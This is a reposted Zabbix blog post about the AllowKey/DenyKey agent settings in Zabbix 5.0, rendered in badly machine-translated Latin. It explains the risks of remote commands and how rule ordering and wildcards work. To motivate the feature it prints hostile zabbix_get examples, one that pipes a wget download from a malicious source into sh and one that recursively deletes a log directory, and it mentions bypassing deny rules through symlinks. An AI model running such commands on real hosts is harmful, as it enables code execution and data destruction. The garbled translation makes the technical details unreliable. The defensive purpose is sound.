ProHoster > Блог > administratio > Blacklist and whitelist support for agent-side metrics in Zabbix 5.0

Blacklist and whitelist support for agent-side metrics in Zabbix 5.0

Blacklist and whitelist support for agent-side metrics in Zabbix 5.0

Blacklist et whitelist subsidia agentis parte metrics

Tikhon Uskov, Integration Engineer, Zabbix

Data securitate quaestiones

Zabbix 5.0 novum plumam habet quod sinit te meliorem securitatem in rationibus utendo Zabbix Agentem ac veterem modulum reponit. EnableRemoteCommands.

Meliora in securitate systematis agentis fundati oriuntur ex eo quod agens magnum numerum actionum periculosarum potentiarum praestare potest.

  • Agens notitias quasdam fere colligere potest, inclusas informationes secretas vel potentia periculosas, ex fasciculis conformationibus, fasciculi stipendii, tesserarum tesserarum, vel quaevis alia documenta.

Exempli causa, utilitate zabbix_get utens, indicem usorum accedere potes, directoria domus, fasciculorum tesserarum, etc.

Blacklist and whitelist support for agent-side metrics in Zabbix 5.0

Accessing notitia usura ad zabbix_get utilitatem

NOTA. Data nonnisi insanabiles esse possunt, si agentis permissiones in tabella respondens legit. Sed, exempli gratia, tabella /etc/passwd/ readable ab omnibus users.

  • Agens etiam periculosa imperia potentia exequi potest. Clavis* exempli gratia.system.run[] ** sinit vos mandata quaelibet remota in retis nodi exequi, inclusa scripta currit e interface Zabbix quae etiam mandata ex parte agentis exequi. 

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

  • In Linux, agens defaltam sine privilegiis radicibus decurrit, dum in Fenestra pro ratione servitii decurrit et ad systematis tabellae accessum liberum habet. Itaque, si nullae mutationes fiunt ad parametri Zabbix agentis post institutionem, agens accessum ad subcriptio, systema fasciculi et WMI queries exequi potest.

In prioribus versionibus parametri EnableRemoteCommands = 0 licet tantum disable metrics cum clavis *system.run[]** et scripta e interreti interreti currit, sed aditus ad singulas tabulas nullo modo erat restringere, aut claves singulas cum agente inaugurari permittere, aut usum parametrorum singularium circumscribere.

Blacklist and whitelist support for agent-side metrics in Zabbix 5.0

Utens EnableRemoteCommand parametri in prioribus versionibus Zabbix

AllowKey / DenyKey

Zabbix 5.0 adiuvat ut contra tam alienum accessum defendat, praebendo albos et notarios ad metri partem agentis permittens et negando.

In Zabbix 5.0 claves omnes, inter *system.run[]** efficiuntur, et duae optiones novae agentis configurationis additae sunt:

AllowKey = — permittitur impedit;

DenyKey= — prohibita compescit;

ubi clavis nomen exemplar cum parametris metacharacteribus utitur (*).

Claves AllowKey et DenyKey permittunt ut singula metrica in certa forma fundata vel permittant vel negarent. Dissimiles aliae parametri conformationes, numerus AllowKey/DenyKey parametri non limitatur. Hoc tibi permittit ut clare definias quidnam agens possit in systemate creando clavium lignorum exsecutabile, ubi ordo in quo scripta sunt munus maximi momenti agit.

Sequentia regularum

Regulae eo ordine cohibentur quo in file configurationem inseruntur. Clavis secundum regulas ante primam copulam retunditur, et ubi clavis elementi notitiae exemplaris congruit, conceditur vel negatur. Post hoc regulae inhibito clausuris et claves reliquae neglectae sunt.

Si ergo elementum admittit et regulam negatam aequet, consequens erit, a qua regula prima in file configuratione.

Blacklist and whitelist support for agent-side metrics in Zabbix 5.0

2 alia praecepta ad eandem formam ac clavem vfs.file.size [/tmp/file]

Ordo utendi in AllowKey / DenyKey claves:

  1. exactissima praecepta;
  2. regulae generales;
  3. regula prohibitiva.

Exempli gratia, si opus est accessum ad lima in quodam folder, primum aditum ad eos permittere debes, deinde omnia negare, quae intra licentias institutas non cadunt. Si regulam negant adhibitam esse, ad folder accessus negabitur.

Blacklist and whitelist support for agent-side metrics in Zabbix 5.0

Recta serie

Si vos postulo ut currere per * utilitates IIsystem.run[]**, et regula negationis primo specificetur, utilitates non deducentur, quia prima forma semper cuilibet clavem congruit, et regulae subsequentes ignorabuntur.

Blacklist and whitelist support for agent-side metrics in Zabbix 5.0

Recta serie

Patterns

praecepta fundamental

Exemplum est expressio cum wildcards. Metacharacter (*) cuiuslibet numeri cuiuslibet notae sub certo situ congruit. Metacharacteres tam in nomine clavi quam in parametris adhiberi possunt. Exempli causa, primum modulum cum textu stricte definire potes; ac speciem sequentem sicut wildcard.

Parametri uncis quadratis includi debent.

  • system.run[* - nefas
  • vfs.file*.txt] - nefas
  • vfs.file.*[*] - ius

Exempla utendi wildcard.

  1. In nomine clavis et in modulo. Hoc in casu, clavis non respondet simili clavi quae modulum non continet, cum in exemplari significavimus nos certam terminationem clavis nominis ac certam parametri accipere velle.
  2. Si exemplaris uncis quadratis non utitur, exemplar omnes claves admittit quae parametri non continent et negat omnes claves quae modulum determinatum continent.
  3. Si clavem in plena scriptam et parametri nominata sint ut wildcard, cuilibet similis clavi erit cuilibet parametrorum aequare et clavem sine uncis quadratis non aequare, i.e. licebit vel negari.

Blacklist and whitelist support for agent-side metrics in Zabbix 5.0

Praecepta parametri ultrices.

  • Si clavis cum parametris uti destinatur, parametri in lima configuratione debent definiri. Parameters ut metacharacter debet specificari. Necesse est ut ad quemvis fasciculi accessum diligenter neges ac perpendat quaenam informationes metricae sub diversis orthographiae - cum et sine parametris providere possint.

Blacklist and whitelist support for agent-side metrics in Zabbix 5.0

Scribere features claves cum parametris

  • Si clavis cum parametris specificetur, parametri autem sunt ad libitum et specificantur ut metacharacteris, clavis sine parametris solvetur. Exempli gratia, si vis accipere informationes de onere in CPU disable et definire ut clavis systematis debilis sit, noli oblivisci clavis sine parametris valorem mediocris onus reddet.

Blacklist and whitelist support for agent-side metrics in Zabbix 5.0

Praecepta parametri ad impletionem

dicta

tionibus

  • Quaedam regulae ab utentis mutari non possunt, exempli gratia, regulae inventionis vel agentis regulae auto-adnotationes. AllowKey / DenyKey praecepta sequenti parametri non afficit:
    - HostnameItem
    - HostMetadataItem
    - HostInterfaceItem

NOTA. Si administrator clavem, cum queritur, clavem disablet, Zabbix informationes non praebet cur in categoriam metrica vel clavis incidat.NOTSUPPORTED'. Informationes de prohibitionibus quae in remotis praeceptis exsequuntur non etiam in tabulariis stipes agentis ostendi. Hoc est propter rationes securitatis, sed inpedire potest debugging si metrice in categoriam nudo aliqua de causa incidant..

  • Ne certo ordine debeas inniti ad connexionem externarum imaginum (exempli gratia, ordine alphabetico).

Imperium linea Utilitas

Cum regulas instituis, fac debes omnia recte configurari.

Una trium optionum uti potes:

  • Ad Zabbix metricam add.
  • Test cum zabbix_agentd. Zabbix agente per optionem -print (-p) ostendit claves omnes (quae per defaltam admittuntur) exceptis iis quae per configurationem non admittuntur. Et cum optio -test (-t) ad clavem vetitam redibit'.Item clavem sine'.
  • Test cum zabbix_get. utilitas zabbix_get per optionem -k redibo'ZBX_NOTSUPPORTED: Stabat Mater'.

Patitur vel negare

Negare potes accessum ad limam et verificandum, exempli gratia, utilitate utens zabbix_getaditus tabellae negatur.

Blacklist and whitelist support for agent-side metrics in Zabbix 5.0

**

NOTA. Quota in parametro neglecta sunt.

Hoc in casu, aditus ad talem fasciculum per aliam viam permitti potest. Ut si symlink conducit.

Blacklist and whitelist support for agent-side metrics in Zabbix 5.0

Commendatur varias optiones cohibere ad normas determinatas applicandas, necnon possibilitates vetitum circumveniendi rationem habere.

Quaestiones et Answers

quaestio. Cur tam multiplex exemplar cum lingua propria ad regulas, permissiones et prohibitiones describendas electa est? Cur uti non potuit, verbi gratia, expressionibus regularibus quibus Zabbix utitur?

responsum. Haec est causa regex effectus, quia plerumque tantum unum agens et ingentem numerum metri coercet. Regex operatio admodum gravis est et mille metri hoc modo inspicienda non est. Wildcards - solutio universalis, late adhibita et simplici.

quaestio. Nonne inclusa sunt fasciculi ordine alphabetico?

responsum. Quantum scio, vix impossibile est praedicere ordinem in quo regulae applicabuntur, si regulas per varias tabulas diffundas. Commendo omnes AllowKey / DenyKey regulas in uno comprehendo fasciculum, quod inter se occurrunt, et hunc fasciculum comprehendo..

quaestio. In Zabbix 5.0 optioEnableRemoteCommands=' Deest e file configurationis, et solum AllowKey/DenyKey praesto sunt?

Responde. ita, ille correctus est.

Спасибо за внимание!

Source: www.habr.com